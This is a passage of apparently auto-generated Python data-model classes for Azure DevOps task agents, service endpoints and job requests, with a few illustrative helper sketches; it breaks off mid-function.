'info_url': {'key': 'infoUrl', 'type': 'str'},
'platform': {'key': 'platform', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'version': {'key': 'version', 'type': 'PackageVersion'}
}
def __init__(self, created_on=None, download_url=None, filename=None, hash_value=None, info_url=None, platform=None, type=None, version=None):
super(PackageMetadata, self).__init__()
self.created_on = created_on
self.download_url = download_url
self.filename = filename
self.hash_value = hash_value
self.info_url = info_url
self.platform = platform
self.type = type
self.version = version
class PackageVersion(Model):
"""
:param major:
:type major: int
:param minor:
:type minor: int
:param patch:
:type patch: int
"""
_attribute_map = {
'major': {'key': 'major', 'type': 'int'},
'minor': {'key': 'minor', 'type': 'int'},
'patch': {'key': 'patch', 'type': 'int'}
}
def __init__(self, major=None, minor=None, patch=None):
super(PackageVersion, self).__init__()
self.major = major
self.minor = minor
self.patch = patch
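# Sketch: PackageVersion is a plain major/minor/patch triple; formatting it
# as a version string is left to callers.
def _format_package_version(v):
    return '{0}.{1}.{2}'.format(v.major, v.minor, v.patch)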
class ProjectReference(Model):
"""
:param id:
:type id: str
:param name:
:type name: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, id=None, name=None):
super(ProjectReference, self).__init__()
self.id = id
self.name = name
class PublishTaskGroupMetadata(Model):
"""
:param comment:
:type comment: str
:param parent_definition_revision:
:type parent_definition_revision: int
:param preview:
:type preview: bool
:param task_group_id:
:type task_group_id: str
:param task_group_revision:
:type task_group_revision: int
"""
_attribute_map = {
'comment': {'key': 'comment', 'type': 'str'},
'parent_definition_revision': {'key': 'parentDefinitionRevision', 'type': 'int'},
'preview': {'key': 'preview', 'type': 'bool'},
'task_group_id': {'key': 'taskGroupId', 'type': 'str'},
'task_group_revision': {'key': 'taskGroupRevision', 'type': 'int'}
}
def __init__(self, comment=None, parent_definition_revision=None, preview=None, task_group_id=None, task_group_revision=None):
super(PublishTaskGroupMetadata, self).__init__()
self.comment = comment
self.parent_definition_revision = parent_definition_revision
self.preview = preview
self.task_group_id = task_group_id
self.task_group_revision = task_group_revision
class ReferenceLinks(Model):
"""
The class to represent a collection of REST reference links.
:param links: The read-only view of the links. Because reference links are read-only, they are exposed only as a read-only view.
:type links: dict
"""
_attribute_map = {
'links': {'key': 'links', 'type': '{object}'}
}
def __init__(self, links=None):
super(ReferenceLinks, self).__init__()
self.links = links
class ResourceLimit(Model):
"""
:param failed_to_reach_all_providers:
:type failed_to_reach_all_providers: bool
:param host_id:
:type host_id: str
:param is_hosted:
:type is_hosted: bool
:param is_premium:
:type is_premium: bool
:param parallelism_tag:
:type parallelism_tag: str
:param resource_limits_data:
:type resource_limits_data: dict
:param total_count:
:type total_count: int
:param total_minutes:
:type total_minutes: int
"""
_attribute_map = {
'failed_to_reach_all_providers': {'key': 'failedToReachAllProviders', 'type': 'bool'},
'host_id': {'key': 'hostId', 'type': 'str'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_premium': {'key': 'isPremium', 'type': 'bool'},
'parallelism_tag': {'key': 'parallelismTag', 'type': 'str'},
'resource_limits_data': {'key': 'resourceLimitsData', 'type': '{str}'},
'total_count': {'key': 'totalCount', 'type': 'int'},
'total_minutes': {'key': 'totalMinutes', 'type': 'int'}
}
def __init__(self, failed_to_reach_all_providers=None, host_id=None, is_hosted=None, is_premium=None, parallelism_tag=None, resource_limits_data=None, total_count=None, total_minutes=None):
super(ResourceLimit, self).__init__()
self.failed_to_reach_all_providers = failed_to_reach_all_providers
self.host_id = host_id
self.is_hosted = is_hosted
self.is_premium = is_premium
self.parallelism_tag = parallelism_tag
self.resource_limits_data = resource_limits_data
self.total_count = total_count
self.total_minutes = total_minutes
class ResourceUsage(Model):
"""
:param resource_limit:
:type resource_limit: :class:`ResourceLimit <azure.devops.v5_1.task_agent.models.ResourceLimit>`
:param running_requests:
:type running_requests: list of :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param used_count:
:type used_count: int
:param used_minutes:
:type used_minutes: int
"""
_attribute_map = {
'resource_limit': {'key': 'resourceLimit', 'type': 'ResourceLimit'},
'running_requests': {'key': 'runningRequests', 'type': '[TaskAgentJobRequest]'},
'used_count': {'key': 'usedCount', 'type': 'int'},
'used_minutes': {'key': 'usedMinutes', 'type': 'int'}
}
def __init__(self, resource_limit=None, running_requests=None, used_count=None, used_minutes=None):
super(ResourceUsage, self).__init__()
self.resource_limit = resource_limit
self.running_requests = running_requests
self.used_count = used_count
self.used_minutes = used_minutes
class ResultTransformationDetails(Model):
"""
:param result_template:
:type result_template: str
"""
_attribute_map = {
'result_template': {'key': 'resultTemplate', 'type': 'str'}
}
def __init__(self, result_template=None):
super(ResultTransformationDetails, self).__init__()
self.result_template = result_template
class SecureFile(Model):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param id:
:type id: str
:param modified_by:
:type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param modified_on:
:type modified_on: datetime
:param name:
:type name: str
:param properties:
:type properties: dict
:param ticket:
:type ticket: str
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'str'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': '{str}'},
'ticket': {'key': 'ticket', 'type': 'str'}
}
def __init__(self, created_by=None, created_on=None, id=None, modified_by=None, modified_on=None, name=None, properties=None, ticket=None):
super(SecureFile, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.id = id
self.modified_by = modified_by
self.modified_on = modified_on
self.name = name
self.properties = properties
self.ticket = ticket
class ServiceEndpoint(Model):
"""
Represents an endpoint which may be used by an orchestration job.
:param administrators_group: Gets or sets the identity reference for the administrators group of the service endpoint.
:type administrators_group: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param authorization: Gets or sets the authorization data for talking to the endpoint.
:type authorization: :class:`EndpointAuthorization <azure.devops.v5_1.task_agent.models.EndpointAuthorization>`
:param created_by: Gets or sets the identity reference for the user who created the Service endpoint.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param data:
:type data: dict
:param description: Gets or sets the description of endpoint.
:type description: str
:param group_scope_id:
:type group_scope_id: str
:param id: Gets or sets the identifier of this endpoint.
:type id: str
:param is_ready: Endpoint state indicator.
:type is_ready: bool
:param is_shared: Indicates whether service endpoint is shared with other projects or not.
:type is_shared: bool
:param name: Gets or sets the friendly name of the endpoint.
:type name: str
:param operation_status: Error message during creation/deletion of endpoint
:type operation_status: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param owner: Gets or sets the owner of the endpoint.
:type owner: str
:param readers_group: Gets or sets the identity reference for the readers group of the service endpoint.
:type readers_group: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param type: Gets or sets the type of the endpoint.
:type type: str
:param url: Gets or sets the url of the endpoint.
:type url: str
"""
_attribute_map = {
'administrators_group': {'key': 'administratorsGroup', 'type': 'IdentityRef'},
'authorization': {'key': 'authorization', 'type': 'EndpointAuthorization'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'data': {'key': 'data', 'type': '{str}'},
'description': {'key': 'description', 'type': 'str'},
'group_scope_id': {'key': 'groupScopeId', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'is_ready': {'key': 'isReady', 'type': 'bool'},
'is_shared': {'key': 'isShared', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'operation_status': {'key': 'operationStatus', 'type': 'object'},
'owner': {'key': 'owner', 'type': 'str'},
'readers_group': {'key': 'readersGroup', 'type': 'IdentityRef'},
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, administrators_group=None, authorization=None, created_by=None, data=None, description=None, group_scope_id=None, id=None, is_ready=None, is_shared=None, name=None, operation_status=None, owner=None, readers_group=None, type=None, url=None):
super(ServiceEndpoint, self).__init__()
self.administrators_group = administrators_group
self.authorization = authorization
self.created_by = created_by
self.data = data
self.description = description
self.group_scope_id = group_scope_id
self.id = id
self.is_ready = is_ready
self.is_shared = is_shared
self.name = name
self.operation_status = operation_status
self.owner = owner
self.readers_group = readers_group
self.type = type
self.url = url
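# Sketch: a service endpoint pairs connection data with an authorization
# scheme. The scheme name and parameter keys below are hypothetical; the
# endpoint type defines which schemes and parameters are actually expected.
def _example_service_endpoint():
    return ServiceEndpoint(
        name='fabrikam-azure',
        type='azurerm',
        url='https://management.azure.com/',
        authorization=EndpointAuthorization(
            scheme='ServicePrincipal',
            parameters={'tenantid': '...', 'serviceprincipalid': '...'},  # placeholders
        ),
    )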
class ServiceEndpointAuthenticationScheme(Model):
"""
:param authorization_headers: Gets or sets the authorization headers of service endpoint authentication scheme.
:type authorization_headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param client_certificates: Gets or sets the certificates of service endpoint authentication scheme.
:type client_certificates: list of :class:`ClientCertificate <azure.devops.v5_1.task_agent.models.ClientCertificate>`
:param display_name: Gets or sets the display name for the service endpoint authentication scheme.
:type display_name: str
:param input_descriptors: Gets or sets the input descriptors for the service endpoint authentication scheme.
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param scheme: Gets or sets the scheme for service endpoint authentication.
:type scheme: str
"""
_attribute_map = {
'authorization_headers': {'key': 'authorizationHeaders', 'type': '[AuthorizationHeader]'},
'client_certificates': {'key': 'clientCertificates', 'type': '[ClientCertificate]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'scheme': {'key': 'scheme', 'type': 'str'}
}
def __init__(self, authorization_headers=None, client_certificates=None, display_name=None, input_descriptors=None, scheme=None):
super(ServiceEndpointAuthenticationScheme, self).__init__()
self.authorization_headers = authorization_headers
self.client_certificates = client_certificates
self.display_name = display_name
self.input_descriptors = input_descriptors
self.scheme = scheme
class ServiceEndpointDetails(Model):
"""
:param authorization:
:type authorization: :class:`EndpointAuthorization <azure.devops.v5_1.task_agent.models.EndpointAuthorization>`
:param data:
:type data: dict
:param type:
:type type: str
:param url:
:type url: str
"""
_attribute_map = {
'authorization': {'key': 'authorization', 'type': 'EndpointAuthorization'},
'data': {'key': 'data', 'type': '{str}'},
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, authorization=None, data=None, type=None, url=None):
super(ServiceEndpointDetails, self).__init__()
self.authorization = authorization
self.data = data
self.type = type
self.url = url
class ServiceEndpointExecutionData(Model):
"""
Represents service endpoint execution data.
:param definition: Gets the definition of service endpoint execution owner.
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param finish_time: Gets the finish time of service endpoint execution.
:type finish_time: datetime
:param id: Gets the Id of service endpoint execution data.
:type id: long
:param owner: Gets the owner of service endpoint execution data.
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_type: Gets the plan type of service endpoint execution data.
:type plan_type: str
:param result: Gets the result of service endpoint execution.
:type result: object
:param start_time: Gets the start time of service endpoint execution.
:type start_time: datetime
"""
_attribute_map = {
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'long'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_type': {'key': 'planType', 'type': 'str'},
'result': {'key': 'result', 'type': 'object'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'}
}
def __init__(self, definition=None, finish_time=None, id=None, owner=None, plan_type=None, result=None, start_time=None):
super(ServiceEndpointExecutionData, self).__init__()
self.definition = definition
self.finish_time = finish_time
self.id = id
self.owner = owner
self.plan_type = plan_type
self.result = result
self.start_time = start_time
class ServiceEndpointExecutionRecord(Model):
"""
:param data: Gets the execution data of service endpoint execution.
:type data: :class:`ServiceEndpointExecutionData <azure.devops.v5_1.task_agent.models.ServiceEndpointExecutionData>`
:param endpoint_id: Gets the Id of service endpoint.
:type endpoint_id: str
"""
_attribute_map = {
'data': {'key': 'data', 'type': 'ServiceEndpointExecutionData'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'}
}
def __init__(self, data=None, endpoint_id=None):
super(ServiceEndpointExecutionRecord, self).__init__()
self.data = data
self.endpoint_id = endpoint_id
class ServiceEndpointExecutionRecordsInput(Model):
"""
:param data:
:type data: :class:`ServiceEndpointExecutionData <azure.devops.v5_1.task_agent.models.ServiceEndpointExecutionData>`
:param endpoint_ids:
:type endpoint_ids: list of str
"""
_attribute_map = {
'data': {'key': 'data', 'type': 'ServiceEndpointExecutionData'},
'endpoint_ids': {'key': 'endpointIds', 'type': '[str]'}
}
def __init__(self, data=None, endpoint_ids=None):
super(ServiceEndpointExecutionRecordsInput, self).__init__()
self.data = data
self.endpoint_ids = endpoint_ids
class ServiceEndpointRequest(Model):
"""
:param data_source_details:
:type data_source_details: :class:`DataSourceDetails <azure.devops.v5_1.task_agent.models.DataSourceDetails>`
:param result_transformation_details:
:type result_transformation_details: :class:`ResultTransformationDetails <azure.devops.v5_1.task_agent.models.ResultTransformationDetails>`
:param service_endpoint_details:
:type service_endpoint_details: :class:`ServiceEndpointDetails <azure.devops.v5_1.task_agent.models.ServiceEndpointDetails>`
"""
_attribute_map = {
'data_source_details': {'key': 'dataSourceDetails', 'type': 'DataSourceDetails'},
'result_transformation_details': {'key': 'resultTransformationDetails', 'type': 'ResultTransformationDetails'},
'service_endpoint_details': {'key': 'serviceEndpointDetails', 'type': 'ServiceEndpointDetails'}
}
def __init__(self, data_source_details=None, result_transformation_details=None, service_endpoint_details=None):
super(ServiceEndpointRequest, self).__init__()
self.data_source_details = data_source_details
self.result_transformation_details = result_transformation_details
self.service_endpoint_details = service_endpoint_details
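# Sketch: a ServiceEndpointRequest bundles what to call (data source
# details), how to reshape the result (result transformation), and the
# endpoint to call it against. Reading this as a proxy-style "execute
# request" payload is an assumption; the selector and template syntax
# below are illustrative only.
def _example_service_endpoint_request():
    return ServiceEndpointRequest(
        data_source_details=DataSourceDetails(
            data_source_url='https://example.com/api/items',
            result_selector='jsonpath:$.value[*]',
        ),
        result_transformation_details=ResultTransformationDetails(
            result_template='{"name": "{{name}}"}',
        ),
        service_endpoint_details=ServiceEndpointDetails(
            type='generic',
            url='https://example.com',
        ),
    )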
class ServiceEndpointRequestResult(Model):
"""
:param error_message:
:type error_message: str
:param result:
:type result: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param status_code:
:type status_code: object
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'result': {'key': 'result', 'type': 'object'},
'status_code': {'key': 'statusCode', 'type': 'object'}
}
def __init__(self, error_message=None, result=None, status_code=None):
super(ServiceEndpointRequestResult, self).__init__()
self.error_message = error_message
self.result = result
self.status_code = status_code
class ServiceEndpointType(Model):
"""
Represents type of the service endpoint.
:param authentication_schemes: Authentication schemes of the service endpoint type.
:type authentication_schemes: list of :class:`ServiceEndpointAuthenticationScheme <azure.devops.v5_1.task_agent.models.ServiceEndpointAuthenticationScheme>`
:param data_sources: Data sources of service endpoint type.
:type data_sources: list of :class:`DataSource <azure.devops.v5_1.task_agent.models.DataSource>`
:param dependency_data: Dependency data of service endpoint type.
:type dependency_data: list of :class:`DependencyData <azure.devops.v5_1.task_agent.models.DependencyData>`
:param description: Gets or sets the description of service endpoint type.
:type description: str
:param display_name: Gets or sets the display name of service endpoint type.
:type display_name: str
:param endpoint_url: Gets or sets the endpoint url of service endpoint type.
:type endpoint_url: :class:`EndpointUrl <azure.devops.v5_1.task_agent.models.EndpointUrl>`
:param help_link: Gets or sets the help link of service endpoint type.
:type help_link: :class:`HelpLink <azure.devops.v5_1.task_agent.models.HelpLink>`
:param help_mark_down:
:type help_mark_down: str
:param icon_url: Gets or sets the icon url of service endpoint type.
:type icon_url: str
:param input_descriptors: Input descriptor of service endpoint type.
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param name: Gets or sets the name of service endpoint type.
:type name: str
:param trusted_hosts: Trusted hosts of a service endpoint type.
:type trusted_hosts: list of str
:param ui_contribution_id: Gets or sets the ui contribution id of service endpoint type.
:type ui_contribution_id: str
"""
_attribute_map = {
'authentication_schemes': {'key': 'authenticationSchemes', 'type': '[ServiceEndpointAuthenticationScheme]'},
'data_sources': {'key': 'dataSources', 'type': '[DataSource]'},
'dependency_data': {'key': 'dependencyData', 'type': '[DependencyData]'},
'description': {'key': 'description', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'EndpointUrl'},
'help_link': {'key': 'helpLink', 'type': 'HelpLink'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'name': {'key': 'name', 'type': 'str'},
'trusted_hosts': {'key': 'trustedHosts', 'type': '[str]'},
'ui_contribution_id': {'key': 'uiContributionId', 'type': 'str'}
}
def __init__(self, authentication_schemes=None, data_sources=None, dependency_data=None, description=None, display_name=None, endpoint_url=None, help_link=None, help_mark_down=None, icon_url=None, input_descriptors=None, name=None, trusted_hosts=None, ui_contribution_id=None):
super(ServiceEndpointType, self).__init__()
self.authentication_schemes = authentication_schemes
self.data_sources = data_sources
self.dependency_data = dependency_data
self.description = description
self.display_name = display_name
self.endpoint_url = endpoint_url
self.help_link = help_link
self.help_mark_down = help_mark_down
self.icon_url = icon_url
self.input_descriptors = input_descriptors
self.name = name
self.trusted_hosts = trusted_hosts
self.ui_contribution_id = ui_contribution_id
class TaskAgentAuthorization(Model):
"""
Provides data necessary for authorizing the agent using OAuth 2.0 authentication flows.
:param authorization_url: Endpoint used to obtain access tokens from the configured token service.
:type authorization_url: str
:param client_id: Client identifier for this agent.
:type client_id: str
:param public_key: Public key used to verify the identity of this agent.
:type public_key: :class:`TaskAgentPublicKey <azure.devops.v5_1.task_agent.models.TaskAgentPublicKey>`
"""
_attribute_map = {
'authorization_url': {'key': 'authorizationUrl', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
'public_key': {'key': 'publicKey', 'type': 'TaskAgentPublicKey'}
}
def __init__(self, authorization_url=None, client_id=None, public_key=None):
super(TaskAgentAuthorization, self).__init__()
self.authorization_url = authorization_url
self.client_id = client_id
self.public_key = public_key
class TaskAgentCloud(Model):
"""
    :param acquire_agent_endpoint: Gets or sets the AcquireAgentEndpoint via which a request can be made to acquire a new agent
:type acquire_agent_endpoint: str
:param acquisition_timeout:
:type acquisition_timeout: int
:param agent_cloud_id:
:type agent_cloud_id: int
:param get_account_parallelism_endpoint:
:type get_account_parallelism_endpoint: str
:param get_agent_definition_endpoint:
:type get_agent_definition_endpoint: str
:param get_agent_request_status_endpoint:
:type get_agent_request_status_endpoint: str
:param id:
:type id: str
:param internal: Signifies that this Agent Cloud is internal and should not be user-manageable
:type internal: bool
:param max_parallelism:
:type max_parallelism: int
:param name:
:type name: str
:param release_agent_endpoint:
:type release_agent_endpoint: str
:param shared_secret:
:type shared_secret: str
:param type: Gets or sets the type of the endpoint.
:type type: str
"""
_attribute_map = {
'acquire_agent_endpoint': {'key': 'acquireAgentEndpoint', 'type': 'str'},
'acquisition_timeout': {'key': 'acquisitionTimeout', 'type': 'int'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'get_account_parallelism_endpoint': {'key': 'getAccountParallelismEndpoint', 'type': 'str'},
'get_agent_definition_endpoint': {'key': 'getAgentDefinitionEndpoint', 'type': 'str'},
'get_agent_request_status_endpoint': {'key': 'getAgentRequestStatusEndpoint', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'internal': {'key': 'internal', 'type': 'bool'},
'max_parallelism': {'key': 'maxParallelism', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'release_agent_endpoint': {'key': 'releaseAgentEndpoint', 'type': 'str'},
'shared_secret': {'key': 'sharedSecret', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'}
}
def __init__(self, acquire_agent_endpoint=None, acquisition_timeout=None, agent_cloud_id=None, get_account_parallelism_endpoint=None, get_agent_definition_endpoint=None, get_agent_request_status_endpoint=None, id=None, internal=None, max_parallelism=None, name=None, release_agent_endpoint=None, shared_secret=None, type=None):
super(TaskAgentCloud, self).__init__()
self.acquire_agent_endpoint = acquire_agent_endpoint
self.acquisition_timeout = acquisition_timeout
self.agent_cloud_id = agent_cloud_id
self.get_account_parallelism_endpoint = get_account_parallelism_endpoint
self.get_agent_definition_endpoint = get_agent_definition_endpoint
self.get_agent_request_status_endpoint = get_agent_request_status_endpoint
self.id = id
self.internal = internal
self.max_parallelism = max_parallelism
self.name = name
self.release_agent_endpoint = release_agent_endpoint
self.shared_secret = shared_secret
self.type = type
class TaskAgentCloudRequest(Model):
"""
:param agent:
:type agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param agent_cloud_id:
:type agent_cloud_id: int
:param agent_connected_time:
:type agent_connected_time: datetime
:param agent_data:
:type agent_data: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param agent_specification:
:type agent_specification: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param pool:
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param provisioned_time:
:type provisioned_time: datetime
:param provision_request_time:
:type provision_request_time: datetime
:param release_request_time:
:type release_request_time: datetime
:param request_id:
:type request_id: str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgentReference'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'agent_connected_time': {'key': 'agentConnectedTime', 'type': 'iso-8601'},
'agent_data': {'key': 'agentData', 'type': 'object'},
'agent_specification': {'key': 'agentSpecification', 'type': 'object'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'provisioned_time': {'key': 'provisionedTime', 'type': 'iso-8601'},
'provision_request_time': {'key': 'provisionRequestTime', 'type': 'iso-8601'},
'release_request_time': {'key': 'releaseRequestTime', 'type': 'iso-8601'},
'request_id': {'key': 'requestId', 'type': 'str'}
}
def __init__(self, agent=None, agent_cloud_id=None, agent_connected_time=None, agent_data=None, agent_specification=None, pool=None, provisioned_time=None, provision_request_time=None, release_request_time=None, request_id=None):
super(TaskAgentCloudRequest, self).__init__()
self.agent = agent
self.agent_cloud_id = agent_cloud_id
self.agent_connected_time = agent_connected_time
self.agent_data = agent_data
self.agent_specification = agent_specification
self.pool = pool
self.provisioned_time = provisioned_time
self.provision_request_time = provision_request_time
self.release_request_time = release_request_time
self.request_id = request_id
class TaskAgentCloudType(Model):
"""
:param display_name: Gets or sets the display name of agent cloud type.
:type display_name: str
:param input_descriptors: Gets or sets the input descriptors
:type input_descriptors: list of :class:`InputDescriptor <azure.devops.v5_1.task_agent.models.InputDescriptor>`
:param name: Gets or sets the name of agent cloud type.
:type name: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'input_descriptors': {'key': 'inputDescriptors', 'type': '[InputDescriptor]'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, display_name=None, input_descriptors=None, name=None):
super(TaskAgentCloudType, self).__init__()
self.display_name = display_name
self.input_descriptors = input_descriptors
self.name = name
class TaskAgentDelaySource(Model):
"""
:param delays:
:type delays: list of object
:param task_agent:
:type task_agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
"""
_attribute_map = {
'delays': {'key': 'delays', 'type': '[object]'},
'task_agent': {'key': 'taskAgent', 'type': 'TaskAgentReference'}
}
def __init__(self, delays=None, task_agent=None):
super(TaskAgentDelaySource, self).__init__()
self.delays = delays
self.task_agent = task_agent
class TaskAgentJobRequest(Model):
"""
A job request for an agent.
:param agent_delays:
:type agent_delays: list of :class:`TaskAgentDelaySource <azure.devops.v5_1.task_agent.models.TaskAgentDelaySource>`
:param agent_specification:
:type agent_specification: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param assign_time: The date/time this request was assigned.
:type assign_time: datetime
:param data: Additional data about the request.
:type data: dict
:param definition: The pipeline definition associated with this request
:type definition: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param demands: A list of demands required to fulfill this request.
:type demands: list of :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param expected_duration:
:type expected_duration: object
:param finish_time: The date/time this request was finished.
:type finish_time: datetime
:param host_id: The host which triggered this request.
:type host_id: str
:param job_id: ID of the job resulting from this request.
:type job_id: str
:param job_name: Name of the job resulting from this request.
:type job_name: str
:param locked_until: The deadline for the agent to renew the lock.
:type locked_until: datetime
:param matched_agents:
:type matched_agents: list of :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param matches_all_agents_in_pool:
:type matches_all_agents_in_pool: bool
:param orchestration_id:
:type orchestration_id: str
:param owner: The pipeline associated with this request
:type owner: :class:`TaskOrchestrationOwner <azure.devops.v5_1.task_agent.models.TaskOrchestrationOwner>`
:param plan_group:
:type plan_group: str
:param plan_id: Internal ID for the orchestration plan connected with this request.
:type plan_id: str
:param plan_type: Internal detail representing the type of orchestration plan.
:type plan_type: str
:param pool_id: The ID of the pool this request targets
:type pool_id: int
:param queue_id: The ID of the queue this request targets
:type queue_id: int
:param queue_time: The date/time this request was queued.
:type queue_time: datetime
    :param receive_time: The date/time this request was received by an agent.
:type receive_time: datetime
:param request_id: ID of the request.
:type request_id: long
:param reserved_agent: The agent allocated for this request.
:type reserved_agent: :class:`TaskAgentReference <azure.devops.v5_1.task_agent.models.TaskAgentReference>`
:param result: The result of this request.
:type result: object
:param scope_id: Scope of the pipeline; matches the project ID.
:type scope_id: str
:param service_owner: The service which owns this request.
:type service_owner: str
:param status_message:
:type status_message: str
:param user_delayed:
:type user_delayed: bool
"""
_attribute_map = {
'agent_delays': {'key': 'agentDelays', 'type': '[TaskAgentDelaySource]'},
'agent_specification': {'key': 'agentSpecification', 'type': 'object'},
'assign_time': {'key': 'assignTime', 'type': 'iso-8601'},
'data': {'key': 'data', 'type': '{str}'},
'definition': {'key': 'definition', 'type': 'TaskOrchestrationOwner'},
'demands': {'key': 'demands', 'type': '[object]'},
'expected_duration': {'key': 'expectedDuration', 'type': 'object'},
'finish_time': {'key': 'finishTime', 'type': 'iso-8601'},
'host_id': {'key': 'hostId', 'type': 'str'},
'job_id': {'key': 'jobId', 'type': 'str'},
'job_name': {'key': 'jobName', 'type': 'str'},
'locked_until': {'key': 'lockedUntil', 'type': 'iso-8601'},
'matched_agents': {'key': 'matchedAgents', 'type': '[TaskAgentReference]'},
'matches_all_agents_in_pool': {'key': 'matchesAllAgentsInPool', 'type': 'bool'},
'orchestration_id': {'key': 'orchestrationId', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'TaskOrchestrationOwner'},
'plan_group': {'key': 'planGroup', 'type': 'str'},
'plan_id': {'key': 'planId', 'type': 'str'},
'plan_type': {'key': 'planType', 'type': 'str'},
'pool_id': {'key': 'poolId', 'type': 'int'},
'queue_id': {'key': 'queueId', 'type': 'int'},
'queue_time': {'key': 'queueTime', 'type': 'iso-8601'},
'receive_time': {'key': 'receiveTime', 'type': 'iso-8601'},
'request_id': {'key': 'requestId', 'type': 'long'},
'reserved_agent': {'key': 'reservedAgent', 'type': 'TaskAgentReference'},
'result': {'key': 'result', 'type': 'object'},
'scope_id': {'key': 'scopeId', 'type': 'str'},
'service_owner': {'key': 'serviceOwner', 'type': 'str'},
'status_message': {'key': 'statusMessage', 'type': 'str'},
'user_delayed': {'key': 'userDelayed', 'type': 'bool'}
}
def __init__(self, agent_delays=None, agent_specification=None, assign_time=None, data=None, definition=None, demands=None, expected_duration=None, finish_time=None, host_id=None, job_id=None, job_name=None, locked_until=None, matched_agents=None, matches_all_agents_in_pool=None, orchestration_id=None, owner=None, plan_group=None, plan_id=None, plan_type=None, pool_id=None, queue_id=None, queue_time=None, receive_time=None, request_id=None, reserved_agent=None, result=None, scope_id=None, service_owner=None, status_message=None, user_delayed=None):
super(TaskAgentJobRequest, self).__init__()
self.agent_delays = agent_delays
self.agent_specification = agent_specification
self.assign_time = assign_time
self.data = data
self.definition = definition
self.demands = demands
self.expected_duration = expected_duration
self.finish_time = finish_time
self.host_id = host_id
self.job_id = job_id
self.job_name = job_name
self.locked_until = locked_until
self.matched_agents = matched_agents
self.matches_all_agents_in_pool = matches_all_agents_in_pool
self.orchestration_id = orchestration_id
self.owner = owner
self.plan_group = plan_group
self.plan_id = plan_id
self.plan_type = plan_type
self.pool_id = pool_id
self.queue_id = queue_id
self.queue_time = queue_time
self.receive_time = receive_time
self.request_id = request_id
self.reserved_agent = reserved_agent
self.result = result
self.scope_id = scope_id
self.service_owner = service_owner
self.status_message = status_message
self.user_delayed = user_delayed
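# A hedged helper sketch, not part of the generated API: the queue/assign/
# receive/finish fields on TaskAgentJobRequest deserialize to datetime
# objects ('iso-8601' in the attribute map), so plain subtraction yields
# wait and run durations.
def _example_request_durations(request):
    queue_wait = run_time = None
    if request.queue_time and request.assign_time:
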